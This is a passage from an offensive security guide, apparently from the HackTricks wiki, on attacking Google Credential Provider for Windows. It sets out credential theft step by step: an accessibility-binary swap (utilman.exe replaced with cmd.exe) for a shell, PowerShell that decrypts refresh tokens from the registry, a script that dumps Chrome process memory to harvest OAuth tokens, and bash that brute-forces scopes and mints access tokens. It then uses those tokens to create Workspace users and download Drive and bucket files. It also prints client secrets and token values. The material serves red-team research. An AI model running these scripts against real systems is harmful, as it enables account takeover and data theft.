+&client_id=77185425430.apps.googleusercontent.com
+&client_secret=OTJgUOQcT7lO7GsGZq2G4IlT
+&code=4/0AVG7fiQ1NKncRzNrrGjY5S02wBWBJxV9kUNSKvB1EnJDCWyDmfZvelqKp0zx8jRGmR7LUw
+&device_id=d5c82f70-71ff-48e8-94db-312e64c7354f
+&device_type=chrome
+```
+{% endcode %}
+
+New lines have been added to make it more readable.
+
+{% hint style="info" %}
+It was possible to perform a MitM by installing `Proxifier` in the PC, overwriting the `utilman.exe` binary with a `cmd.exe` and executing the **accessibility features** in the Windows login page, which will execute a **CMD** from which you can **launch and configure the Proxifier**.\
+Don't forget to **block QUICK UDP** traffic in `Proxifier` so it downgrades to TCP communication and you can see it.
+
+Also configure in "Serviced and other users" both options and install the Burp CA cert in the Windows.
+{% endhint %}
+
+Moreover adding the keys `enable_verbose_logging = 1` and `log_file_path = C:\Public\gcpw.log` in **`HKLM:\SOFTWARE\Google\GCPW`** it's possible to make it store some logs.
+
+### GCPW - Fingerprint
+
+It's possible to check if GCPW is installed in a device checking if the following process exist or if the following registry keys exist:
+
+```powershell
+# Check process gcpw_extension.exe
+if (Get-Process -Name "gcpw_extension" -ErrorAction SilentlyContinue) {
+    Write-Output "The process gcpw_xtension.exe is running."
+} else {
+    Write-Output "The process gcpw_xtension.exe is not running."
+}
+
+# Check if HKLM\SOFTWARE\Google\GCPW\Users exists
+$gcpwHKLMPath = "HKLM:\SOFTWARE\Google\GCPW\Users"
+if (Test-Path $gcpwHKLMPath) {
+    Write-Output "GCPW is installed: The key $gcpwHKLMPath exists."
+} else {
+    Write-Output "GCPW is not installed: The key $gcpwHKLMPath does not exist."
+}
+
+# Check if HKCU\SOFTWARE\Google\Accounts exists
+$gcpwHKCUPath = "HKCU:\SOFTWARE\Google\Accounts"
+if (Test-Path $gcpwHKCUPath) {
+    Write-Output "Google Accounts are present: The key $gcpwHKCUPath exists."
+} else {
+    Write-Output "No Google Accounts found: The key $gcpwHKCUPath does not exist."
+}
+```
+
+In **`HKCU:\SOFTWARE\Google\Accounts`** it's possible to access the email of the user and the encrypted **refresh token** if the user recently logged in.
+
+In **`HKLM:\SOFTWARE\Google\GCPW\Users`** it's possible to find the **domains** that are allowed to login in the key `domains_allowed` and in subkeys it's possible to find information about the user like email, pic, user name, token lifetimes, token handle...
+
+{% hint style="info" %}
+The token handle is a token that starts with `eth.` and from which can be extracted some info with a request like:
+
+{% code overflow="wrap" %}
+```bash
+curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \
+  -d 'token_handle=eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg'
+# Example response
+{
+  "audience": "77185425430.apps.googleusercontent.com",
+  "scope": "https://www.google.com/accounts/OAuthLogin",
+  "expires_in": 12880152
+}
+```
+{% endcode %}
+
+Also it's possible to find the token handle of an access token with a request like:
+
+{% code overflow="wrap" %}
+```bash
+curl -s 'https://www.googleapis.com/oauth2/v2/tokeninfo' \
+  -d 'access_token=<access token>'
+# Example response
+{
+  "issued_to": "77185425430.apps.googleusercontent.com",
+  "audience": "77185425430.apps.googleusercontent.com",
+  "scope": "https://www.google.com/accounts/OAuthLogin",
+  "expires_in": 1327,
+  "access_type": "offline",
+  "token_handle": "eth.ALh9Bwhhy_aDaRGhv4v81xRNXdt8BDrWYrM2DBv-aZwPdt7U54gp-m_3lEXsweSyUAuN3J-9KqzbDgHBfFzYqVink340uYtWAwxsXZgqFKrRGzmXZcJNVapkUpLVsYZ_F87B5P_iUzTG-sffD4_kkd0SEwZ0hSSgKVuLT-2eCY67qVKxfGvnfmg"
+}
+```
+{% endcode %}
+
+Afaik it's not possible obtain a refresh token or access token from the token handle.
+{% endhint %}
+
+Moreover, the file **`C:\ProgramData\Google\Credential Provider\Policies\<sid>\PolicyFetchResponse`** is a json containing the information of different **settings** like `enableDmEnrollment`, `enableGcpAutoUpdate`, `enableMultiUserLogin` (if several users from Workspace can login in the computer) and `validityPeriodDays` (number of days a user doesn't need to reauthenticate with Google directly).
+
+## GCPW - Get Tokens
+
+### GCPW - Registry Refresh Tokens
+
+Inside the registry **`HKCU:\SOFTWARE\Google\Accounts`** it might be possible to find some accounts with the **`refresh_token`** encrypted inside. The method **`ProtectedData.Unprotect`** can easily decrypt it.
+
+<details>
+
+<summary>Get <strong><code>HKCU:\SOFTWARE\Google\Accounts</code></strong> data and decrypt refresh_tokens</summary>
+
+```powershell
+# Import required namespace for decryption
+Add-Type -AssemblyName System.Security
+
+# Base registry path
+$baseKey = "HKCU:\SOFTWARE\Google\Accounts"
+
+# Function to search and decrypt refresh_token values
+function Get-RegistryKeysAndDecryptTokens {
+    param (
+        [string]$keyPath
+    )
+
+    # Get all values within the current key
+    $registryKey = Get-Item -Path $keyPath
+    $foundToken = $false
+
+    # Loop through properties to find refresh_token
+    foreach ($property in $registryKey.Property) {
+        if ($property -eq "refresh_token") {
+            $foundToken = $true
+            try {
+                # Get the raw bytes of the refresh_token from the registry
+                $encryptedTokenBytes = (Get-ItemProperty -Path $keyPath -Name $property).$property
+
+                # Decrypt the bytes using ProtectedData.Unprotect
+                $decryptedTokenBytes = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedTokenBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+                $decryptedToken = [System.Text.Encoding]::UTF8.GetString($decryptedTokenBytes)
+                
+                Write-Output "Path: $keyPath"
+                Write-Output "Decrypted refresh_token: $decryptedToken"
+                Write-Output "-----------------------------"
+            }
+            catch {
+                Write-Output "Path: $keyPath"
+                Write-Output "Failed to decrypt refresh_token: $($_.Exception.Message)"
+                Write-Output "-----------------------------"
+            }
+        }
+    }
+
+    # Recursively process all subkeys
+    Get-ChildItem -Path $keyPath | ForEach-Object {
+        Get-RegistryKeysAndDecryptTokens -keyPath $_.PSPath
+    }
+}
+
+# Start the search from the base key
+Get-RegistryKeysAndDecryptTokens -keyPath $baseKey
+```
+
+</details>
+
+Example out:
+
+{% code overflow="wrap" %}
+```
+Path: Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\SOFTWARE\Google\Accounts\100402336966965820570Decrypted refresh_token: 1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI
+```
+{% endcode %}
+
+As explained in [**this video**](https://www.youtube.com/watch?v=FEQxHRRP_5I), if you don't find the token in the registry it's possible to modify the value (or delete) from **`HKLM:\SOFTWARE\Google\GCPW\Users\<sid>\th`** and the next time the user access the computer he will need to login again and the **token will be stored in the previous registry**.
+
+### GCPW - Disk Refresh Tokens
+
+The file **`%LocalAppData%\Google\Chrome\User Data\Local State`** stores the key to decrypt the **`refresh_tokens`** located inside the **Google Chrome profiles** of the user like:
+
+* `%LocalAppData%\Google\Chrome\User Data\Default\Web Data`
+* `%LocalAppData%\Google\Chrome\Profile*\Default\Web Data`
+
+It's possible to find some **C# code** accessing these tokens in their decrypted manner in [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe).
+
+Moreover, the encrypting can be found in this code: [https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os\_crypt/sync/os\_crypt\_win.cc#L216](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L216)
+
+It can be observed that AESGCM is used, the encrypted token starts with a **version** (**`v10`** at this time), then it [**has 12B of nonce**](https://github.com/chromium/chromium/blob/7b5e817cb016f946a29378d2d39576a4ca546605/components/os_crypt/sync/os_crypt_win.cc#L42), and then it has the **cypher-text** with a final **mac of 16B**.
+
+### GCPW - Dumping tokens from processes memory
+
+The following script can be used to **dump** every **Chrome** process using `procdump`, extract the **strings** and then **search** for strings related to **access and refresh tokens**. If Chrome is connected to some Google site, some **process will be storing refresh and/or access tokens in memory!**
+
+<details>
+
+<summary>Dump Chrome processes and search tokens</summary>
+
+```powershell
+# Define paths for Procdump and Strings utilities   
+$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"   
+$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"   
+$dumpFolder = "C:\Users\Public\dumps"   
+ 
+# Regular expressions for tokens 
+$tokenRegexes = @( 
+    "ya29\.[a-zA-Z0-9_\.\-]{50,}", 
+    "1//[a-zA-Z0-9_\.\-]{50,}" 
+)
+ 
+# Create a directory for the dumps if it doesn't exist   
+if (!(Test-Path $dumpFolder)) {   
+    New-Item -Path $dumpFolder -ItemType Directory   
+}   
+ 
+# Get all Chrome process IDs   
+$chromeProcesses = Get-Process -Name "chrome" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id   
+ 
+# Dump each Chrome process   
+foreach ($processId in $chromeProcesses) {   
+    Write-Output "Dumping process with PID: $processId"   
+    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"   
+}   
+ 
+# Extract strings and search for tokens in each dump   
+Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {   
+    $dumpFile = $_.FullName   
+    $baseName = $_.BaseName 
+    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"   
+    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"   
+ 
+    Write-Output "Extracting strings from $dumpFile"   
+    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile   
+    & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile   
+ 
+    $outputFiles = @($asciiStringsFile, $unicodeStringsFile) 
+ 
+    foreach ($file in $outputFiles) { 
+        foreach ($regex in $tokenRegexes) { 
+ 
+            $matches = Select-String -Path $file -Pattern $regex -AllMatches 
+ 
+            $uniqueMatches = @{} 
+ 
+            foreach ($matchInfo in $matches) { 
+                foreach ($match in $matchInfo.Matches) { 
+                    $matchValue = $match.Value 
+                    if (-not $uniqueMatches.ContainsKey($matchValue)) { 
+                        $uniqueMatches[$matchValue] = @{ 
+                            LineNumber = $matchInfo.LineNumber 
+                            LineText   = $matchInfo.Line.Trim() 
+                            FilePath   = $matchInfo.Path 
+                        } 
+                    } 
+                } 
+            } 
+ 
+            foreach ($matchValue in $uniqueMatches.Keys) { 
+                $info = $uniqueMatches[$matchValue] 
+                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" 
+            } 
+        } 
+ 
+        Write-Output "" 
+    } 
+} 
+ 
+Remove-Item -Path $dumpFolder -Recurse -Force
+```
+
+</details>
+
+I tried the same with `gcpw_extension.exe` but it didn't find any token.
+
+For some reason, s**ome extracted access tokens won't be valid (although some will be)**. I tried the following script to remove chars 1 by 1 to try to get the valid token from the dump. It never helped me to find a valid one, but it might I guess:
+
+<details>
+
+<summary>Check access token by removing chars 1 by 1</summary>
+
+```bash
+#!/bin/bash
+
+# Define the initial access token
+access_token="ya29.a0AcM612wWX6Pe3Pc6ApZYknGs5n66W1Hr1CQvF_L_pIm3uZaXWisWFabzxheYCHErRn28l2UOJuAbMzfn1TUpSKqvYvlhXJpxQsKEtwhYXzN2BZdOQNji0EXfF7po1_0WaxhwqOiE0CFQciiL8uAmkRsoXhq9ekC_S8xLrODZ2yKdDR6gSFULWaiIG-bOCFx3DkbOdbjAk-U4aN1WbglUAJdLZh7DMzSucIIZwKWvBxqqajSAjrdW0mRNVN2IfkcVLPndwj7fQJV2bQaCgYKAbQSAQ4SFQHGX2MiPuU1D-9-YHVzaFlUo_RwXA0277"
+
+# Define the URL for the request
+url="https://www.googleapis.com/oauth2/v1/tokeninfo"
+
+# Loop until the token is 20 characters or the response doesn't contain "error_description"
+while [ ${#access_token} -gt 20 ]; do
+    # Make the request and capture the response
+    response=$(curl -s -H "Content-Type: application/x-www-form-urlencoded" -d "access_token=$access_token" $url)
+
+    # Check if the response contains "error_description"
+    if [[ ! "$response" =~ "error_description" ]]; then
+        echo "Success: Token is valid"
+        echo "Final token: $access_token"
+        echo "Response: $response"
+        exit 0
+    fi
+
+    # Remove the last character from the token
+    access_token=${access_token:0:-1}
+
+    echo "Token length: ${#access_token}"
+done
+
+echo "Error: Token invalid or too short"
+```
+
+</details>
+
+### GCPW - Generating access tokens from refresh tokens
+
+Using the refresh token it's possible to generate access tokens using it and the client ID and client secret specified in the following command:
+
+```bash
+curl -s --data "client_id=77185425430.apps.googleusercontent.com" \
+     --data "client_secret=OTJgUOQcT7lO7GsGZq2G4IlT" \
+     --data "grant_type=refresh_token" \
+     --data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
+     https://www.googleapis.com/oauth2/v4/token
+```
+
+### GCPW - Scopes
+
+{% hint style="info" %}
+Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
+
+Alsoe, the refresh token is not valid in every application.
+{% endhint %}
+
+By default GCPW won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
+
+<details>
+
+<summary>Bash script to brute-force scopes</summary>
+
+```bash
+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do 
+    echo -ne "Testing $scope           \r"
+    if ! curl -s --data "client_id=77185425430.apps.googleusercontent.com" \
+     --data "client_secret=OTJgUOQcT7lO7GsGZq2G4IlT" \
+     --data "grant_type=refresh_token" \
+     --data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
+     --data "scope=$scope" \
+     https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
+        echo ""
+        echo $scope
+        echo $scope >> /tmp/valid_scopes.txt
+    fi
+done
+
+echo ""
+echo ""
+echo "Valid scopes:"
+cat /tmp/valid_scopes.txt
+rm /tmp/valid_scopes.txt
+```
+
+</details>
+
+And this is the output I got at the time of the writing:
+
+<details>
+
+<summary>Brute-forced scopes</summary>
+
+```
+https://www.googleapis.com/auth/admin.directory.user
+https://www.googleapis.com/auth/calendar
+https://www.googleapis.com/auth/calendar.events
+https://www.googleapis.com/auth/calendar.events.readonly
+https://www.googleapis.com/auth/calendar.readonly
+https://www.googleapis.com/auth/classroom.courses.readonly
+https://www.googleapis.com/auth/classroom.coursework.me.readonly
+https://www.googleapis.com/auth/classroom.coursework.students.readonly
+https://www.googleapis.com/auth/classroom.profile.emails
+https://www.googleapis.com/auth/classroom.profile.photos
+https://www.googleapis.com/auth/classroom.rosters.readonly
+https://www.googleapis.com/auth/classroom.student-submissions.me.readonly
+https://www.googleapis.com/auth/classroom.student-submissions.students.readonly
+https://www.googleapis.com/auth/cloud-translation
+https://www.googleapis.com/auth/cloud_search.query
+https://www.googleapis.com/auth/devstorage.read_write
+https://www.googleapis.com/auth/drive
+https://www.googleapis.com/auth/drive.apps.readonly
+https://www.googleapis.com/auth/drive.file
+https://www.googleapis.com/auth/drive.readonly
+https://www.googleapis.com/auth/ediscovery
+https://www.googleapis.com/auth/firebase.messaging
+https://www.googleapis.com/auth/spreadsheets
+https://www.googleapis.com/auth/tasks
+https://www.googleapis.com/auth/tasks.readonly
+https://www.googleapis.com/auth/userinfo.email
+https://www.googleapis.com/auth/userinfo.profile
+```
+
+</details>
+
+Moreover, checking the Chromium source code it's possible to [**find this file**](https://github.com/chromium/chromium/blob/5301790cd7ef97088d4862465822da4cb2d95591/google_apis/gaia/gaia_constants.cc#L24), which contains **other scopes** that can be assumed that **doesn't appear in the previously brute-forced lis**t. Therefore, these extra scopes can be assumed:
+
+<details>
+
+<summary>Extra scopes</summary>
+
+```
+https://www.google.com/accounts/OAuthLogin
+https://www.googleapis.com/auth/account.capabilities
+https://www.googleapis.com/auth/accounts.programmaticchallenge
+https://www.googleapis.com/auth/accounts.reauth
+https://www.googleapis.com/auth/admin.directory.user
+https://www.googleapis.com/auth/aida
+https://www.googleapis.com/auth/aidahttps://www.googleapis.com/auth/kid.management.privileged
+https://www.googleapis.com/auth/android_checkin
+https://www.googleapis.com/auth/any-api
+https://www.googleapis.com/auth/assistant-sdk-prototype
+https://www.googleapis.com/auth/auditrecording-pa
+https://www.googleapis.com/auth/bce.secureconnect
+https://www.googleapis.com/auth/calendar
+https://www.googleapis.com/auth/calendar.events
+https://www.googleapis.com/auth/calendar.events.readonly
+https://www.googleapis.com/auth/calendar.readonly
+https://www.googleapis.com/auth/cast.backdrop
+https://www.googleapis.com/auth/cclog
+https://www.googleapis.com/auth/chrome-model-execution
+https://www.googleapis.com/auth/chrome-optimization-guide
+https://www.googleapis.com/auth/chrome-safe-browsing
+https://www.googleapis.com/auth/chromekanonymity
+https://www.googleapis.com/auth/chromeosdevicemanagement
+https://www.googleapis.com/auth/chromesync
+https://www.googleapis.com/auth/chromewebstore.readonly
+https://www.googleapis.com/auth/classroom.courses.readonly
+https://www.googleapis.com/auth/classroom.coursework.me.readonly
+https://www.googleapis.com/auth/classroom.coursework.students.readonly
+https://www.googleapis.com/auth/classroom.profile.emails
+https://www.googleapis.com/auth/classroom.profile.photos
+https://www.googleapis.com/auth/classroom.rosters.readonly
+https://www.googleapis.com/auth/classroom.student-submissions.me.readonly
+https://www.googleapis.com/auth/classroom.student-submissions.students.readonly
+https://www.googleapis.com/auth/cloud-translation
+https://www.googleapis.com/auth/cloud_search.query
+https://www.googleapis.com/auth/cryptauth
+https://www.googleapis.com/auth/devstorage.read_write
+https://www.googleapis.com/auth/drive
+https://www.googleapis.com/auth/drive.apps.readonly
+https://www.googleapis.com/auth/drive.file
+https://www.googleapis.com/auth/drive.readonly
+https://www.googleapis.com/auth/ediscovery
+https://www.googleapis.com/auth/experimentsandconfigs
+https://www.googleapis.com/auth/firebase.messaging
+https://www.googleapis.com/auth/gcm
+https://www.googleapis.com/auth/googlenow
+https://www.googleapis.com/auth/googletalk
+https://www.googleapis.com/auth/identity.passwords.leak.check
+https://www.googleapis.com/auth/ip-protection
+https://www.googleapis.com/auth/kid.family.readonly
+https://www.googleapis.com/auth/kid.management.privileged
+https://www.googleapis.com/auth/kid.permission
+https://www.googleapis.com/auth/kids.parentapproval
+https://www.googleapis.com/auth/kids.supervision.setup.child
+https://www.googleapis.com/auth/lens
+https://www.googleapis.com/auth/music
+https://www.googleapis.com/auth/nearbydevices-pa
+https://www.googleapis.com/auth/nearbypresence-pa
+https://www.googleapis.com/auth/nearbysharing-pa
+https://www.googleapis.com/auth/peopleapi.readonly
+https://www.googleapis.com/auth/peopleapi.readwrite
+https://www.googleapis.com/auth/photos
+https://www.googleapis.com/auth/photos.firstparty.readonly
+https://www.googleapis.com/auth/photos.image.readonly
+https://www.googleapis.com/auth/profile.language.read
+https://www.googleapis.com/auth/secureidentity.action
+https://www.googleapis.com/auth/spreadsheets
+https://www.googleapis.com/auth/supportcontent
+https://www.googleapis.com/auth/tachyon
+https://www.googleapis.com/auth/tasks
+https://www.googleapis.com/auth/tasks.readonly
+https://www.googleapis.com/auth/userinfo.email
+https://www.googleapis.com/auth/userinfo.profile
+https://www.googleapis.com/auth/wallet.chrome
+```
+
+</details>
+
+Note that the most interesting one is possibly:
+
+```c
+// OAuth2 scope for access to all Google APIs.
+const char kAnyApiOAuth2Scope[] = "https://www.googleapis.com/auth/any-api";
+```
+
+However, I tried to use this scope to access gmail or list groups and it didn't work, so I don't know how useful it still is.
+
+**Get an access token with all those scopes**:
+
+<details>
+
+<summary>Bash script to generate access token from refresh_token with all the scopes</summary>
+
+```bash
+export scope=$(echo "https://www.googleapis.com/auth/admin.directory.user
+https://www.googleapis.com/auth/calendar
+https://www.googleapis.com/auth/calendar.events
+https://www.googleapis.com/auth/calendar.events.readonly
+https://www.googleapis.com/auth/calendar.readonly
+https://www.googleapis.com/auth/classroom.courses.readonly
+https://www.googleapis.com/auth/classroom.coursework.me.readonly
+https://www.googleapis.com/auth/classroom.coursework.students.readonly
+https://www.googleapis.com/auth/classroom.profile.emails
+https://www.googleapis.com/auth/classroom.profile.photos
+https://www.googleapis.com/auth/classroom.rosters.readonly
+https://www.googleapis.com/auth/classroom.student-submissions.me.readonly
+https://www.googleapis.com/auth/classroom.student-submissions.students.readonly
+https://www.googleapis.com/auth/cloud-translation
+https://www.googleapis.com/auth/cloud_search.query
+https://www.googleapis.com/auth/devstorage.read_write
+https://www.googleapis.com/auth/drive
+https://www.googleapis.com/auth/drive.apps.readonly
+https://www.googleapis.com/auth/drive.file
+https://www.googleapis.com/auth/drive.readonly
+https://www.googleapis.com/auth/ediscovery
+https://www.googleapis.com/auth/firebase.messaging
+https://www.googleapis.com/auth/spreadsheets
+https://www.googleapis.com/auth/tasks
+https://www.googleapis.com/auth/tasks.readonly
+https://www.googleapis.com/auth/userinfo.email
+https://www.googleapis.com/auth/userinfo.profile
+https://www.google.com/accounts/OAuthLogin
+https://www.googleapis.com/auth/account.capabilities
+https://www.googleapis.com/auth/accounts.programmaticchallenge
+https://www.googleapis.com/auth/accounts.reauth
+https://www.googleapis.com/auth/admin.directory.user
+https://www.googleapis.com/auth/aida
+https://www.googleapis.com/auth/kid.management.privileged
+https://www.googleapis.com/auth/android_checkin
+https://www.googleapis.com/auth/any-api
+https://www.googleapis.com/auth/assistant-sdk-prototype
+https://www.googleapis.com/auth/auditrecording-pa
+https://www.googleapis.com/auth/bce.secureconnect
+https://www.googleapis.com/auth/calendar
+https://www.googleapis.com/auth/calendar.events
+https://www.googleapis.com/auth/calendar.events.readonly
+https://www.googleapis.com/auth/calendar.readonly
+https://www.googleapis.com/auth/cast.backdrop
+https://www.googleapis.com/auth/cclog
+https://www.googleapis.com/auth/chrome-model-execution
+https://www.googleapis.com/auth/chrome-optimization-guide
+https://www.googleapis.com/auth/chrome-safe-browsing
+https://www.googleapis.com/auth/chromekanonymity
+https://www.googleapis.com/auth/chromeosdevicemanagement
+https://www.googleapis.com/auth/chromesync
+https://www.googleapis.com/auth/chromewebstore.readonly
+https://www.googleapis.com/auth/classroom.courses.readonly
+https://www.googleapis.com/auth/classroom.coursework.me.readonly
+https://www.googleapis.com/auth/classroom.coursework.students.readonly
+https://www.googleapis.com/auth/classroom.profile.emails
+https://www.googleapis.com/auth/classroom.profile.photos
+https://www.googleapis.com/auth/classroom.rosters.readonly
+https://www.googleapis.com/auth/classroom.student-submissions.me.readonly
+https://www.googleapis.com/auth/classroom.student-submissions.students.readonly
+https://www.googleapis.com/auth/cloud-translation
+https://www.googleapis.com/auth/cloud_search.query
+https://www.googleapis.com/auth/cryptauth
+https://www.googleapis.com/auth/devstorage.read_write
+https://www.googleapis.com/auth/drive
+https://www.googleapis.com/auth/drive.apps.readonly
+https://www.googleapis.com/auth/drive.file
+https://www.googleapis.com/auth/drive.readonly
+https://www.googleapis.com/auth/ediscovery
+https://www.googleapis.com/auth/experimentsandconfigs
+https://www.googleapis.com/auth/firebase.messaging
+https://www.googleapis.com/auth/gcm
+https://www.googleapis.com/auth/googlenow
+https://www.googleapis.com/auth/googletalk
+https://www.googleapis.com/auth/identity.passwords.leak.check
+https://www.googleapis.com/auth/ip-protection
+https://www.googleapis.com/auth/kid.family.readonly
+https://www.googleapis.com/auth/kid.management.privileged
+https://www.googleapis.com/auth/kid.permission
+https://www.googleapis.com/auth/kids.parentapproval
+https://www.googleapis.com/auth/kids.supervision.setup.child
+https://www.googleapis.com/auth/lens
+https://www.googleapis.com/auth/music
+https://www.googleapis.com/auth/nearbydevices-pa
+https://www.googleapis.com/auth/nearbypresence-pa
+https://www.googleapis.com/auth/nearbysharing-pa
+https://www.googleapis.com/auth/peopleapi.readonly
+https://www.googleapis.com/auth/peopleapi.readwrite
+https://www.googleapis.com/auth/photos
+https://www.googleapis.com/auth/photos.firstparty.readonly
+https://www.googleapis.com/auth/photos.image.readonly
+https://www.googleapis.com/auth/profile.language.read
+https://www.googleapis.com/auth/secureidentity.action
+https://www.googleapis.com/auth/spreadsheets
+https://www.googleapis.com/auth/supportcontent
+https://www.googleapis.com/auth/tachyon
+https://www.googleapis.com/auth/tasks
+https://www.googleapis.com/auth/tasks.readonly
+https://www.googleapis.com/auth/userinfo.email
+https://www.googleapis.com/auth/userinfo.profile
+https://www.googleapis.com/auth/wallet.chrome" | tr '\n' ' ')
+
+curl -s --data "client_id=77185425430.apps.googleusercontent.com" \
+     --data "client_secret=OTJgUOQcT7lO7GsGZq2G4IlT" \
+     --data "grant_type=refresh_token" \
+     --data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
+     --data "scope=$scope" \
+     https://www.googleapis.com/oauth2/v4/token
+```
+
+</details>
+
+Some examples using some of those scopes:
+
+<details>
+
+<summary>https://www.googleapis.com/auth/userinfo.email &#x26; https://www.googleapis.com/auth/userinfo.profile</summary>
+
+```bash
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/oauth2/v2/userinfo"
+  
+{
+  "id": "100203736939176354570",
+  "email": "hacktricks@example.com",
+  "verified_email": true,
+  "name": "John Smith",
+  "given_name": "John",
+  "family_name": "Smith",
+  "picture": "https://lh3.googleusercontent.com/a/ACg8ocKLvue[REDACTED]wcnzhyKH_p96Gww=s96-c",
+  "locale": "en",
+  "hd": "example.com"
+}
+```
+
+</details>
+
+<details>
+
+<summary>https://www.googleapis.com/auth/admin.directory.user</summary>
+
+```bash
+# List users
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/admin/directory/v1/users?customer=<workspace_id>&maxResults=100&orderBy=email"
+
+# Create user
+curl -X POST \
+  -H "Authorization: Bearer $access_token" \
+  -H "Content-Type: application/json" \
+  -d '{
+        "primaryEmail": "newuser@hdomain.com",
+        "name": {
+          "givenName": "New",
+          "familyName": "User"
+        },
+        "password": "UserPassword123",
+        "changePasswordAtNextLogin": true
+      }' \
+  "https://www.googleapis.com/admin/directory/v1/users"
+```
+
+</details>
+
+<details>
+
+<summary>https://www.googleapis.com/auth/drive</summary>
+
+```bash
+# List files
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/drive/v3/files?pageSize=10&fields=files(id,name,modifiedTime)&orderBy=name"
+{
+  "files": [
+    {
+      "id": "1Z8m5ALSiHtewoQg1LB8uS9gAIeNOPBrq",
+      "name": "Veeam new vendor form 1 2024.docx",
+      "modifiedTime": "2024-08-30T09:25:35.219Z"
+    }
+  ]
+}
+
+# Download file
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/drive/v3/files/<file-id>?alt=media" \
+  -o "DownloadedFileName.ext"
+
+# Upload file
+curl -X POST \
+  -H "Authorization: Bearer $access_token" \
+  -H "Content-Type: application/octet-stream" \
+  --data-binary @path/to/file.ext \
+  "https://www.googleapis.com/upload/drive/v3/files?uploadType=media"
+```
+
+</details>
+
+<details>
+
+<summary>https://www.googleapis.com/auth/devstorage.read_write</summary>
+
+```bash
+# List buckets from a project
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/storage/v1/b?project=<project-id>"
+
+# List objects in a bucket
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/storage/v1/b/<bucket-name>/o?maxResults=10&fields=items(id,name,size,updated)&orderBy=name"
+
+# Upload file to bucket
+curl -X POST \
+  -H "Authorization: Bearer $access_token" \
+  -H "Content-Type: application/octet-stream" \
+  --data-binary @path/to/yourfile.ext \
+  "https://www.googleapis.com/upload/storage/v1/b/<BUCKET_NAME>/o?uploadType=media&name=<OBJECT_NAME>"
+
+# Download file from bucket
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/storage/v1/b/BUCKET_NAME/o/OBJECT_NAME?alt=media" \
+  -o "DownloadedFileName.ext"
+```
+
+</details>
+
+<details>
+
+<summary>https://www.googleapis.com/auth/spreadsheets</summary>
+
+```bash
+# List spreadsheets
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/drive/v3/files?q=mimeType='application/vnd.google-apps.spreadsheet'&fields=files(id,name,modifiedTime)&pageSize=100"
+
+# Download as pdf
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://www.googleapis.com/drive/v3/files/106VJxeyIsVTkixutwJM1IiJZ0ZQRMiA5mhfe8C5CxMc/export?mimeType=application/pdf" \
+  -o "Spreadsheet.pdf"
+
+# Create spreadsheet
+curl -X POST \
+  -H "Authorization: Bearer $access_token" \
+  -H "Content-Type: application/json" \
+  -d '{
+        "properties": {
+          "title": "New Spreadsheet"
+        }
+      }' \
+  "https://sheets.googleapis.com/v4/spreadsheets"
+
+# Read data from a spreadsheet
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://sheets.googleapis.com/v4/spreadsheets/<SPREADSHEET_ID>/values/Sheet1!A1:C10"
+
+# Update data in spreadsheet
+curl -X PUT \
+  -H "Authorization: Bearer $access_token" \
+  -H "Content-Type: application/json" \
+  -d '{
+        "range": "Sheet1!A2:C2",
+        "majorDimension": "ROWS",
+        "values": [
